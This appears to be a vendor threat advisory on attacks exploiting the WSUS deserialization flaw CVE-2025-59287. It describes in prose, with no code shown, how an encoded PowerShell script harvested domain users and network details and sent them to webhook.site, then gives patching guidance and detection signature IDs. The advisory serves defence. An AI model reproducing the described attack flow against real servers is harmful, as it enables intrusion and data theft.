Counter Threat Unit™ (CTU) researchers are currently delving into the exploitation of a remote code execution vulnerability, designated as CVE-2025-59287, found within Microsoft’s Windows Server Update Service (WSUS). This tool serves as a fundamental IT management resource for Windows systems administrators. On October 14, 2025, Microsoft took proactive measures by releasing patches for the affected versions of Windows Server. Following the publication of a detailed technical analysis of CVE-2025-59287 and the subsequent emergence of proof-of-concept (PoC) code on GitHub, Microsoft issued an out-of-band security update on October 23.
Observations and analysis
On October 24, Sophos identified instances of exploitation of this critical deserialization bug across various customer environments. The surge of activity, which unfolded over several hours, specifically targeted internet-facing WSUS servers and affected a diverse array of industries. Notably, these incidents did not appear to be the result of targeted attacks. It remains uncertain whether the threat actors utilized the publicly available PoC or crafted their own exploit.
The earliest recorded activity was noted on October 24 at 02:53 UTC, when an unidentified threat actor initiated a process that caused IIS worker processes on vulnerable Windows WSUS servers to execute a Base64-encoded PowerShell script through two nested cmd.exe processes. This sequence is illustrated in Figure 1.
The decoded PowerShell command was designed to collect and exfiltrate sensitive information to the external Webhook.site service, as depicted in Figure 2. The script was capable of harvesting the external IP address and port of the targeted host, compiling a list of Active Directory domain users, and gathering configurations of all connected network interfaces. It attempted to transmit this data to a hard-coded Webhook.site address via an HTTP POST request utilizing the Invoke-WebRequest cmdlet. In the event of failure, the script resorted to the native curl command for data transmission. Across the six incidents documented in Sophos customer telemetry, CTU researchers observed four distinct webhook.site URLs.
Three of these URLs were associated with Webhook.site’s complimentary service, which imposes a limit of 100 webhook requests. As of this report, the request history for two of these URLs remains accessible to anyone with the link. Analysis of the requests indicated that the exploitation of vulnerable servers commenced on October 24 at 02:53:47 UTC, reaching the maximum limit of 100 requests by 11:32 UTC. The raw content revealed sensitive domain user and interface information from multiple universities, as well as organizations in the technology, manufacturing, and healthcare sectors. A significant number of the affected entities are located in the United States. Censys scan data corroborated that the public interfaces recorded in the webhook content aligned with Windows servers that had default WSUS ports 8530 and 8531 exposed to the public.
Recommendations and detections
In light of these findings, CTU researchers advise organizations operating WSUS services to undertake the following actions:
- Review the vendor advisory and apply patches and remediation guidance as appropriate.
- Identify WSUS server interfaces that are exposed to the internet.
- Examine available network, host, and application logs for signs of malicious scanning and exploitation.
- Implement segmentation and filtering to limit access to WSUS ports and services to only those systems that require it.
Additionally, the following Sophos protections are in place to detect activity associated with this threat:
- SID: 2311778
- SID: 2311779
- SID: 2311809
- SID: 2311810
- SID: 65422
